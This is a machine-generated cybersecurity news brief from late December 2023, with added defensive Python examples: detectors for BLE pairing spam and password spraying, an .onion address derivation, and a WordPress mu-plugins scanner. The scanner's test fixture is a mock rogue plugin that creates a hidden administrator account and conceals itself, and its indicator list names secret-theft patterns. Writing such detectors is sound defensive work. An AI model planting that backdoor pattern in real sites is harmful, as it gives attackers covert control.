Daily Brief

The summaries below are machine-generated from the linked articles.

Total articles found: 11758

2023-12-25 07:56:51 thehackernews NATION STATE ACTIVITY Cloud Atlas Espionage Group Targets Russian Entities with Spear-Phishing
Cloud Atlas, a cyber espionage group of undetermined origin, has launched spear-phishing attacks on Russian agricultural and research companies. Cybersecurity company F.A.C.C.T., which identified the attacks, notes that Cloud Atlas has been active since at least 2014 and has targeted multiple countries, Russia among them. The attack chain starts with phishing emails carrying a malicious document that exploits CVE-2017-11882, a long-patched memory-corruption flaw in the Microsoft Office Equation Editor. Recent attacks use a multi-stage sequence that deploys a PowerShell-based backdoor and DLL payloads communicating with an attacker-controlled server. Cloud Atlas evades detection by routing traffic through legitimate cloud storage services and abusing legitimate software features, coupled with unique payload requests and validation checks before later stages are served. The group continues to get results from an old, widely patched vulnerability combined with careful staging that hides its malware from security tools, and its campaigns remain an ongoing problem, showing both persistence and a selective approach to malware and attack vectors.
2023-12-24 15:11:18 bleepingcomputer CYBERCRIME Google Chrome Enhances User Security with Automatic Safety Checks
Google Chrome's Safety Check feature will now run continuously in the background rather than only on demand, checking for compromised passwords. The browser will alert users to harmful extensions, prompt them to update to the latest Chrome version and verify that Safe Browsing is enabled. Permissions granted to websites that have not been visited recently will be revoked automatically, and Safety Check will flag sites that bombard users with notifications and offer a quick way to disable them. Since its 2020 debut, Safety Check has compared saved credentials against known breach data and identified weak passwords. Unrelated to security, desktop users will be able to save tab groups and resume them on other devices, and Chrome's memory saver will show per-tab memory usage and which tabs can be made inactive to free resources. On the web-security side, Chrome now automatically upgrades HTTP navigations to HTTPS where the site supports it and is expanding real-time Safe Browsing phishing protection with an up-to-date list of malicious URLs.
2023-12-24 05:52:05 thehackernews CYBERCRIME British Teen Hackers of LAPSUS$ Group Face Legal Consequences
Two British teenagers associated with the cybercrime group LAPSUS$ have been sentenced for their roles in a string of high-profile intrusions. Arion Kurtaj, who is autistic, was found unfit to stand trial, so a jury ruled only on whether he committed the acts; he received an indefinite hospital order after the court heard he remained intent on returning to cybercrime. A 17-year-old accomplice, unnamed because of his age, was given a Youth Rehabilitation Order with intensive supervision. The two took part in attacks on major companies including Microsoft, NVIDIA and Uber and were arrested and re-arrested during 2022; Kurtaj breached his bail conditions by continuing to attack targets until his final arrest, illustrating how hard it is to deter a determined offender. LAPSUS$'s methods, including SIM swapping and public extortion, were documented in a report by the U.S. Department of Homeland Security's Cyber Safety Review Board. The group's notoriety has spawned imitators, pointing to a growing trend of youth-led cybercrime crews. Law enforcement stressed the serious legal consequences young people face for cybercrime and the importance of steering technically gifted youth toward legitimate pursuits.
2023-12-23 15:12:58 bleepingcomputer CYBERCRIME Python Script 'Wall of Flippers' Targets Bluetooth Spam Threat
'Wall of Flippers', a new Python project, detects the Bluetooth Low Energy (BLE) advertising spam that devices such as the Flipper Zero and Android phones can generate. Security researcher 'Techryptic' showed in September 2023 that a Flipper Zero can flood nearby Apple devices with bogus Bluetooth pairing pop-ups by broadcasting spoofed advertising packets. Simon Dankelmann then built an equivalent Android app, extending the attack to Android and Windows targets; attendees at Midwest FurFest 2023 reported such spam, with possible interference with medical devices and payment readers. Beyond the nuisance, these attacks could pose real health risks to people who rely on Bluetooth-connected medical equipment. Apple added mitigations in iOS 17.2, but equivalent protection on Android has not been confirmed. Wall of Flippers passively listens for BLE advertisements and logs the source MAC address, signal strength (RSSI) and packet contents of likely attackers, so users can identify and respond to the spam. The project is ongoing, runs on Linux and Windows, and the author expects further updates to improve detection.
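What a detector of this kind has to do, as an added example (this is not Wall of Flippers' own code): parse raw BLE advertising payloads into their AD structures, recognise the advert types that trigger pairing pop-ups (Apple Continuity manufacturer data, Google Fast Pair service data, Microsoft Swift Pair beacons) and flag a source address that emits far more of them per second than a real accessory ever would. The sample packets, MAC addresses and the rate threshold are constructed for the example; the project's own logic and thresholds may differ.

```python
"""Heuristic detector for BLE pairing-popup spam of the Flipper Zero / Android kind.

Added example; not Wall of Flippers' own code.  Raw advertising payloads are
parsed into AD structures, adverts that trigger pairing pop-ups on phones are
classified (Apple Continuity, Google Fast Pair, Microsoft Swift Pair), and any
source address that emits more of them per time window than a real accessory
ever would is flagged.  All packets below are constructed, not captured.
"""
from collections import defaultdict

AD_FLAGS, AD_COMPLETE_NAME, AD_SERVICE_DATA_16, AD_MANUFACTURER = 0x01, 0x09, 0x16, 0xFF
APPLE_COMPANY_ID, MICROSOFT_COMPANY_ID = 0x004C, 0x0006
FAST_PAIR_UUID = 0xFE2C                     # Google Fast Pair 16-bit service UUID
MS_BEACON_ID = 0x03                         # Swift Pair "Microsoft Beacon ID"
APPLE_POPUP_TYPES = {0x07: "apple-proximity-pairing", 0x0F: "apple-nearby-action"}


def parse_ad_structures(payload: bytes):
    """Yield (ad_type, value) for each length-prefixed AD structure in an advert."""
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:                      # zero-length entry marks padding
            break
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure")
        yield payload[i + 1], payload[i + 2:i + 1 + length]
        i += 1 + length


def classify(payload: bytes):
    """Return a label if the advert is of a kind that pops a pairing dialog, else None."""
    for ad_type, value in parse_ad_structures(payload):
        if ad_type == AD_MANUFACTURER and len(value) >= 3:
            company = int.from_bytes(value[:2], "little")
            if company == APPLE_COMPANY_ID and value[2] in APPLE_POPUP_TYPES:
                return APPLE_POPUP_TYPES[value[2]]
            if company == MICROSOFT_COMPANY_ID and value[2] == MS_BEACON_ID:
                return "microsoft-swift-pair"
        elif ad_type == AD_SERVICE_DATA_16 and len(value) >= 2:
            if int.from_bytes(value[:2], "little") == FAST_PAIR_UUID:
                return "google-fast-pair"
    return None


def detect_spam(packets, window_s=5.0, threshold=10):
    """packets: iterable of (t_seconds, mac, rssi_dbm, payload_bytes).

    Returns {mac: {"count", "kinds", "rssi"}} for every address that sent at
    least `threshold` popup-triggering adverts inside one window.  A genuine
    accessory advertises a few times per second at most; spam tools blast far
    more, so a per-window count separates them (the threshold is a tunable guess).
    """
    buckets = defaultdict(list)
    for t, mac, rssi, payload in packets:
        kind = classify(payload)
        if kind:
            buckets[(mac, int(t // window_s))].append((kind, rssi))
    flagged = {}
    for (mac, _), hits in buckets.items():
        if len(hits) >= threshold and len(hits) > flagged.get(mac, {}).get("count", 0):
            flagged[mac] = {"count": len(hits),
                            "kinds": sorted({k for k, _ in hits}),
                            "rssi": max(r for _, r in hits)}   # strongest = closest
    return flagged


def ad(ad_type: int, value: bytes) -> bytes:
    """Build one AD structure: length byte, type byte, value."""
    return bytes([len(value) + 1, ad_type]) + value


# Constructed sample adverts (shapes follow the public formats; contents are dummies)
APPLE_AIRPODS_SPAM = ad(AD_MANUFACTURER, b"\x4c\x00\x07\x19\x01\x02\x20" + b"\x00" * 22)
FAST_PAIR = ad(AD_FLAGS, b"\x06") + ad(AD_SERVICE_DATA_16, b"\x2c\xfe\x12\x34\x56")
SWIFT_PAIR = ad(AD_MANUFACTURER, b"\x06\x00\x03\x00\x80Headset")
BENIGN = ad(AD_FLAGS, b"\x06") + ad(AD_COMPLETE_NAME, b"Thermo")

SAMPLE_PACKETS = (
    [(0.1 * i, "de:ad:be:ef:00:01", -40, APPLE_AIRPODS_SPAM) for i in range(12)]    # spammer
    + [(0.0, "c0:ff:ee:00:00:02", -70, FAST_PAIR), (2.5, "c0:ff:ee:00:00:02", -71, FAST_PAIR)]  # real earbuds
    + [(0.5 * i, "11:22:33:44:55:66", -60, BENIGN) for i in range(10)]            # unrelated sensor
)

if __name__ == "__main__":
    for mac, info in detect_spam(SAMPLE_PACKETS).items():
        print(f"{mac}: {info['count']} {', '.join(info['kinds'])} adverts, strongest RSSI {info['rssi']} dBm")
```

Feeding it real traffic means replacing SAMPLE_PACKETS with tuples from a BLE scanner that exposes raw advertising data; the RSSI field is what lets a responder walk toward the strongest signal. Spam tools randomise the source MAC, so a global per-window count across all addresses is a worthwhile second check that this example leaves out.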
2023-12-23 12:50:17 theregister NATION STATE ACTIVITY Iranian Cyber Spies Launch New Backdoor in Defense Sector Attack
Iranian APT group Peach Sandstorm targeted U.S. defense-industrial-base organizations with a custom backdoor dubbed FalseFont, which provides remote access and data exfiltration. Microsoft Threat Intelligence identified the espionage attempts, observing password spraying for initial access and custom tooling for lateral movement. The group, also tracked as APT33 by Mandiant, is interested in the commercial and military aviation and energy sectors, primarily in the U.S., Saudi Arabia and South Korea. The Register's roundup also covers other news: an international law-enforcement operation spanning 17 countries cracked down on credit card theft from e-commerce sites, identifying 443 compromised shops, with Group-IB and Sansec taking part in the operation against JavaScript sniffers and uncovering 23 JS-sniffer families affecting e-commerce platforms worldwide. Critical vulnerabilities, including a heap buffer overflow in Chrome and a session-rendering issue in macOS Sonoma, call for immediate patching. And Russian infosec employee Nikita Kislitsin, wanted by the U.S. for cybercrimes, will be extradited from Kazakhstan to Russia, where he faces hacking charges.
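Password spraying, the initial-access technique Microsoft observed, is detectable from ordinary sign-in logs. Added example, not Microsoft's detection logic: it looks for one source IP failing against many distinct accounts with only one or two attempts each inside a short window, which separates a spray from a single user fumbling their own password, and reports any account that IP later signed into successfully. The log format, the lines and the thresholds are constructed.

```python
"""Password-spray detection over sign-in logs.

Added example, not Microsoft's detection logic.  A spray looks like one source
trying a handful of common passwords against many accounts, so the signal is:
one IP, many distinct users failing, few failures per user, inside a short
window; a success from that IP against an account it already failed on is the
"they got in" case.  The log line format and the lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(FAIL|SUCCESS)$")


def parse(lines):
    """Yield (timestamp, ip, user, ok) tuples; lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            yield ts, m.group(2), m.group(3), m.group(4) == "SUCCESS"


def detect_password_spray(lines, window=timedelta(minutes=10), min_users=10, max_per_user=2):
    """Return one finding per source IP whose failures fit the spray pattern."""
    by_ip = defaultdict(list)
    for ev in parse(lines):
        by_ip[ev[1]].append(ev)
    findings = []
    for ip, events in sorted(by_ip.items()):
        events.sort(key=lambda e: e[0])
        fails = [e for e in events if not e[3]]
        best = None
        for i, (t0, _, _, _) in enumerate(fails):        # sliding window over failures
            per_user = defaultdict(int)
            for t, _, user, _ in fails[i:]:
                if t - t0 > window:
                    break
                per_user[user] += 1
            # many users, few tries each: a spray rather than a brute force on one account
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best["distinct_users"]:
                    best = {"ip": ip, "window_start": t0, "distinct_users": len(per_user),
                            "max_failures_per_user": max(per_user.values()),
                            "failures": sum(per_user.values())}
        if best:
            failed_users = {e[2] for e in fails}
            best["compromised"] = sorted({e[2] for e in events if e[3] and e[2] in failed_users})
            findings.append(best)
    return findings


def constructed_log():
    """Synthetic sign-in log: a spray from one IP, a forgetful user, a normal login."""
    base = datetime(2023, 12, 20, 1, 0, tzinfo=timezone.utc)

    def fmt(t):
        return f"{t:%Y-%m-%dT%H:%M:%SZ}"

    lines = [f"{fmt(base + timedelta(seconds=20 * n))} ip=203.0.113.5 user=user{n:02d} result=FAIL"
             for n in range(25)]                                     # 25 accounts, one try each
    lines.append(f"{fmt(base + timedelta(seconds=520))} ip=203.0.113.5 user=user17 result=SUCCESS")
    lines += [f"{fmt(base + timedelta(seconds=30 * n))} ip=198.51.100.7 user=bob result=FAIL"
              for n in range(4)]                                     # one user, several tries
    lines.append(f"{fmt(base + timedelta(seconds=130))} ip=198.51.100.7 user=bob result=SUCCESS")
    lines.append(f"{fmt(base + timedelta(seconds=300))} ip=192.0.2.9 user=carol result=SUCCESS")
    return lines


if __name__ == "__main__":
    for f in detect_password_spray(constructed_log()):
        print(f"{f['ip']}: {f['distinct_users']} accounts, {f['failures']} failures from "
              f"{f['window_start']:%H:%M:%S}Z, compromised={f['compromised'] or 'none'}")
```

Against a real identity provider the same logic applies to its failure codes (for Entra ID, invalid-password failures rather than locked-out or MFA-denied ones), and sprays from a botnet spread the attempts over many IPs, so a second pass keyed on user-agent or ASN instead of IP is worth adding.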
2023-12-23 01:37:27 bleepingcomputer DATA BREACH Mint Mobile Hit with Data Breach Exposing Customer Info
Mint Mobile, an MVNO owned by T-Mobile, has disclosed a security breach exposing customer personal information. Customers were notified on December 22; the exposed data is the kind an attacker uses to attempt SIM swapping against the affected numbers. The breach exposed names, addresses, e-mail addresses and phone numbers; credit card numbers were not stored by Mint and so were not exposed. Mint says passwords are protected with strong cryptography, though it has not said whether the hashed passwords were accessed. The company says the breach has been resolved and that it is working with cybersecurity experts to strengthen its security. Mint deems no customer action necessary but has set up a dedicated support number for related inquiries. Mint Mobile suffered a previous breach in 2021, and its parent T-Mobile has faced multiple data breaches, including a large one in January 2023. BleepingComputer asked Mint for specifics of the breach and whether hashed passwords were accessed but has not yet received a response.
2023-12-22 21:23:10 bleepingcomputer CYBERCRIME FBI Strikes BlackCat Ransomware, Seizes URLs and Decrypts Data
The FBI disrupted the BlackCat/ALPHV ransomware operation, a group responsible for more than $300 million in ransom demands from over 1,000 victims. During the operation the FBI obtained the gang's decryption keys and the private keys for its Tor hidden services, allowing it to help 400 victims recover their data free of charge. Because both law enforcement and the gang now hold the same hidden-service private keys, each side can publish the same .onion addresses, and the two have been trading control of the gang's Tor sites back and forth. The disruption has cost BlackCat the trust of its affiliates, who are looking for new ways to contact victims or moving to other gangs. Despite the setback, there is talk of a possible "cartel" between BlackCat and LockBit to unite against law enforcement. Other incidents this week include large data breaches at Mr. Cooper, affecting 14.7 million people, and ESO Solutions, affecting 2.7 million patients, alongside ransomware attacks on a number of other organizations.
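Why both the FBI and the gang can stand up the "same" site: a v3 .onion address is derived from the hidden service's ed25519 public key, so whoever holds the matching private key can sign and publish descriptors for that address. Added example showing the derivation from the Tor v3 rendezvous spec (not code from the article or from any seizure tooling); the key bytes are a constructed placeholder, not a real service key.

```python
"""A v3 .onion address is derived from the hidden service's ed25519 public key.

Added example, not code from the article or from any seizure tooling.  It shows
why whoever holds a hidden service's private key controls its address: the
address is just the public key plus a checksum and version byte, base32-encoded,
and descriptors for it must be signed with the matching private key.  The key
used below is a constructed placeholder, not a real service key.
"""
import base64
import hashlib

ONION_VERSION = 3
CHECKSUM_PREFIX = b".onion checksum"      # fixed string from the Tor v3 rend spec


def _checksum(pubkey: bytes, version: int) -> bytes:
    """CHECKSUM = SHA3-256(".onion checksum" || PUBKEY || VERSION)[:2]."""
    return hashlib.sha3_256(CHECKSUM_PREFIX + pubkey + bytes([version])).digest()[:2]


def onion_address(pubkey: bytes) -> str:
    """32-byte ed25519 public key -> base32(PUBKEY || CHECKSUM || VERSION) + '.onion'."""
    if len(pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    raw = pubkey + _checksum(pubkey, ONION_VERSION) + bytes([ONION_VERSION])
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def pubkey_from_address(address: str) -> bytes:
    """Inverse: validate length, version and checksum, return the public key."""
    label = address.lower().removesuffix(".onion")
    if len(label) != 56:
        raise ValueError("v3 onion labels are exactly 56 base32 characters")
    raw = base64.b32decode(label.upper())
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34]
    if version != ONION_VERSION:
        raise ValueError(f"unsupported onion version {version}")
    if checksum != _checksum(pubkey, version):
        raise ValueError("checksum mismatch: not a valid v3 onion address")
    return pubkey


def same_service(address_a: str, address_b: str) -> bool:
    """Two addresses name the same service iff they embed the same public key."""
    return pubkey_from_address(address_a) == pubkey_from_address(address_b)


if __name__ == "__main__":
    # Placeholder key.  In a real deployment the public half comes from
    # HiddenServiceDir/hs_ed25519_secret_key, which is the file that gives
    # whoever holds it (here, both the FBI and the gang) control of the address.
    placeholder_pubkey = bytes(range(32))
    addr = onion_address(placeholder_pubkey)
    print(addr)
    print("round-trip ok:", pubkey_from_address(addr) == placeholder_pubkey)
```

The practical consequence is that a seizure banner on the address proves nothing about who controls it at any later moment; as long as the gang retains a copy of the key, it can publish a fresh descriptor pointing the same address at its own server, and the only permanent fix for either side is a new key and therefore a new address.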
2023-12-22 18:19:25 bleepingcomputer DATA BREACH Ubisoft Probing Potential Internal Data Security Incident
Ubisoft is investigating a possible security breach after images of internal software and developer tools surfaced online. The company, known for games such as Assassin's Creed and Far Cry, confirmed the investigation to BleepingComputer. Screenshots shared by vx-underground suggest unauthorized access to Ubisoft's internal services. An unidentified threat actor claims to have breached Ubisoft's network and to have been preparing to exfiltrate roughly 900GB of data. The systems reportedly accessed include Ubisoft's SharePoint server, Microsoft Teams, Confluence and the MongoDB Atlas management panel. The actor says they attempted to steal Rainbow Six Siege user data but lost access before achieving that goal. MongoDB recently disclosed a security incident of its own, but it appears unrelated to this one. Past Ubisoft incidents include a 2020 ransomware attack and a 2022 disruption affecting games and services.
2023-12-22 18:14:03 bleepingcomputer DATA BREACH Ubisoft Probes Alleged Data Breach Amidst Developer Tool Leaks
Ubisoft is investigating a potential security breach following online leaks of images of internal software and developer tools. The leaked screenshots appear to show access to internal services including Ubisoft's SharePoint server, Microsoft Teams and Confluence. An unidentified threat actor told vx-underground they got into Ubisoft's systems on December 20 and intended to exfiltrate about 900GB of data. The same actor said they tried to steal Rainbow Six Siege user data but were cut off before exfiltrating it. Ubisoft has suffered earlier breaches, including the 2020 Egregor ransomware attack that led to leaked source code and a 2022 incident that disrupted its operations. There is currently no evidence linking this alleged breach to the security incident MongoDB disclosed recently, despite the similar timing.
2023-12-22 16:52:02 thehackernews MALWARE Magecart Campaign Uses Rogue WordPress Plugin for Credit Card Theft
A fraudulent WordPress plugin is injecting malicious JavaScript to steal credit card data from e-commerce sites. Security firm Sucuri reports that the plugin creates rogue admin users and skims card details entered during checkout. It installs itself in the WordPress 'must-use plugins' (mu-plugins) directory, whose contents WordPress loads automatically on every request and which cannot be deactivated from the dashboard, and it disables functions to evade removal. The plugin is part of a wider Magecart campaign that uses skimming techniques against online storefronts and exfiltrates the stolen data to an attacker-controlled domain. Separately, recent WordPress phishing campaigns mimic security alerts to trick site owners into installing malicious plugins that hand attackers admin access. Europol has highlighted digital skimming as an ongoing threat, notifying 443 online merchants that customer payment data on their sites had been compromised; Group-IB, which took part in that operation, says it tracks 132 JS-sniffer families in total. In other news, scammers are using Google Search and Twitter ads to promote a cryptocurrency drainer, causing significant losses to victims.
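A quick audit of the directory the plugin hides in, as an added example (not Sucuri's tooling or the campaign's code): score each PHP file under wp-content/mu-plugins on indicators drawn from the description above (creating an administrator, tampering with plugin listings, decoding an embedded payload, referencing checkout or card fields, making outbound requests) and report the suspicious ones. The indicator patterns, weights, threshold and the two fixture files are my own constructions, not anything observed in the wild.

```python
"""Heuristic audit of a WordPress wp-content/mu-plugins directory for rogue plugins.

Added example, not Sucuri's tooling or the campaign's code.  Files in mu-plugins
load on every request and cannot be deactivated from the dashboard, which is
why a skimmer would live there.  Each PHP file is scored on indicators drawn
from the write-up; weights, patterns, threshold and fixture files are my own
constructions.
"""
import os
import re
import tempfile

INDICATORS = [  # (regex, weight, description)
    (r"\beval\s*\(", 3, "eval() of runtime-built code"),
    (r"\b(base64_decode|gzinflate|str_rot13)\s*\(", 2, "decodes an embedded payload"),
    (r"\b(wp_create_user|wp_insert_user)\s*\(", 2, "creates a WordPress user"),
    (r"set_role\s*\(\s*['\"]administrator['\"]|['\"]role['\"]\s*=>\s*['\"]administrator",
     3, "grants administrator role"),
    (r"add_filter\s*\(\s*['\"](all_plugins|show_advanced_plugins)['\"]", 3, "tampers with plugin listing"),
    (r"\b(cvv|cvc|card_?number|checkout)\b", 1, "references checkout or card fields"),
    (r"\b(curl_exec|wp_remote_post|file_get_contents)\s*\(", 1, "makes outbound requests"),
]
SUSPICIOUS_SCORE = 4   # tunable; a benign mu-plugin rarely scores above 1 or 2


def score_php(source: str):
    """Return (score, [descriptions]) for one PHP source text."""
    hits = [(w, d) for rx, w, d in INDICATORS if re.search(rx, source, re.IGNORECASE)]
    return sum(w for w, _ in hits), [d for _, d in hits]


def scan_mu_plugins(mu_dir: str):
    """Score every .php file under mu_dir; most suspicious first."""
    findings = []
    for root, _, files in os.walk(mu_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, reasons = score_php(fh.read())
            findings.append({"file": os.path.relpath(path, mu_dir), "score": score,
                             "reasons": reasons, "suspicious": score >= SUSPICIOUS_SCORE})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed fixture: one harmless mu-plugin and one modelled on the write-up
BENIGN_PLUGIN = "<?php\ndefine('WP_MEMORY_LIMIT', '256M');\n"
ROGUE_PLUGIN = r"""<?php
add_action('init', function () {
    if (!username_exists('wpsupport')) {
        $id = wp_create_user('wpsupport', 'P@ss', 'support@example.invalid');
        (new WP_User($id))->set_role('administrator');
    }
});
add_filter('all_plugins', function ($plugins) { unset($plugins['helper.php']); return $plugins; });
add_action('wp_footer', function () {
    if (is_page('checkout')) { echo base64_decode('PHNjcmlwdD4='); }  // skimmer stub
});
"""


def demo():
    """Write the fixture to a temp dir, scan it, return the findings."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    with open(os.path.join(mu_dir, "helper.php"), "w") as fh:
        fh.write(ROGUE_PLUGIN)
    with open(os.path.join(mu_dir, "memory.php"), "w") as fh:
        fh.write(BENIGN_PLUGIN)
    return scan_mu_plugins(mu_dir)


if __name__ == "__main__":
    for f in demo():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['file']} score={f['score']} {'; '.join(f['reasons'])}")
```

On a real install, call scan_mu_plugins('/path/to/wp-content/mu-plugins') and treat a hit as a reason to read the file, not as proof; since the plugin's first act is to create an administrator, pair the scan with a review of the wp_users table for administrators nobody remembers creating.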
2023-12-22 16:41:31 bleepingcomputer CYBERCRIME Nissan Australia Hit by Akira Ransomware Attack, Data at Risk
The Akira ransomware gang claims to have breached Nissan Australia and stolen roughly 100GB of data. It is threatening to leak sensitive business and client information, including employees' personal details, NDAs and project files. After ransom negotiations failed, Akira announced it would publish the stolen data. Akira has been active since March 2023, hits organizations across many sectors, and has a Linux encryptor that targets VMware ESXi virtual machines. Its ransom demands range from $200,000 to several million dollars, scaled to the size of the victim. Nissan Australia is restoring affected systems and assessing the full impact of the breach, with an investigation ongoing. The company has notified the relevant cyber security, privacy and law enforcement agencies and has advised customers to watch for suspicious activity, while keeping lines of communication open with its dealerships and customers.
2023-12-22 16:00:27 theregister CYBERCRIME Inside Track on Cyber Sleuths Penetrating Ransomware Syndicates
Defenders were briefly encouraged when the AlphV/BlackCat ransomware group's website went offline, though it was soon restored. Singapore-based Group-IB has infiltrated several high-profile ransomware groups to gather insider intelligence on their operations. Its multi-step approach starts with thorough research into the targeted ransomware-as-a-service (RaaS) group and its terms and conditions, then establishes contact with the group's managers. The crux is passing a rigorous interview, in which researchers must convincingly play prospective affiliates, demonstrate technical knowledge and avoid linguistic slips that would betray them. Once inside, Group-IB collects data on the group's internal workings, such as attack counts, ransom payments and affiliate payment structures, to support future mitigation and response. The operations stay within legal bounds: the aim is not to take part in attacks but to gather information that helps victims and improves understanding of the threat actors. Their value lies in aiding victims and investigations and in sharpening preventive measures against ransomware.
2023-12-22 14:53:53 bleepingcomputer CYBERCRIME Over 400 E-Commerce Sites Hit by Credit Card Skimming Malware
Europol has notified 443 online merchants that malicious skimming scripts had been injected into their websites. The JavaScript skimmers intercept customers' payment card data as they buy, exposing them to fraudulent transactions and the sale of their data on the dark web. The two-month international effort, led by Greece and supported by law enforcement from 17 countries, identified the compromised shops. Analysts found 23 distinct JavaScript sniffer families, which evade detection with techniques such as posing as legitimate web services. Group-IB and Sansec, along with national CSIRTs, worked with Europol during the investigation. Europol recommends that merchants review its digital-skimming defense guide, particularly ahead of peak online shopping seasons, and advises customers to use one-time payment methods and to monitor their statements for signs of card compromise.
2023-12-22 13:32:10 bleepingcomputer MALWARE Millions Duped by Fake VPN Extensions Hiding in Game Torrents
More than 1.5 million users unknowingly installed malicious Chrome extensions posing as VPN services. The extensions were delivered by installers bundled with pirated video game torrents, which silently added them to the browser without any user interaction. Google removed the extensions from the Chrome Web Store after being notified. Most victims were in Russia and neighbouring countries. The malware targeted competing cashback and coupon extensions so that affiliate revenue from the infected browsers went only to the operators. ReasonLabs, which discovered the campaign, found that the extensions requested extensive permissions enabling data theft and browser manipulation and that they communicated with a command-and-control server, pointing to an organized cybercrime operation. The incident underscores the need for users to review and prune their browser extensions regularly.
2023-12-22 13:21:40 thehackernews NATION STATE ACTIVITY Operation RusticWeb: Rust Malware Hits Indian Government
Indian government and defense organizations have been hit by a phishing campaign, dubbed Operation RusticWeb, that plants Rust-based malware for intelligence collection. Security firm SEQRITE identified the campaign, noting novel Rust payloads and PowerShell commands used for stealthy document exfiltration. Overlaps with two Pakistan-linked groups, Transparent Tribe and SideCopy, suggest a nation-state actor is behind the attacks. Recent attacks used decoy Microsoft PowerPoint files and exploited the WinRAR vulnerability CVE-2023-38831 for broad system control and remote access. The phishing chain starts with a malicious PDF lure that launches the Rust payload, which quietly scans the system while the decoy document is displayed. The malware focuses on collecting system information and files and is less sophisticated than other cybercriminal tooling. A second attack chain found by SEQRITE uses PowerShell for data gathering and a Rust executable masquerading as a legitimate application to deploy the payload. Continued aggressive activity by nation-state actors such as the DoNot Team shows how persistent these threats are in geopolitically sensitive regions like Kashmir.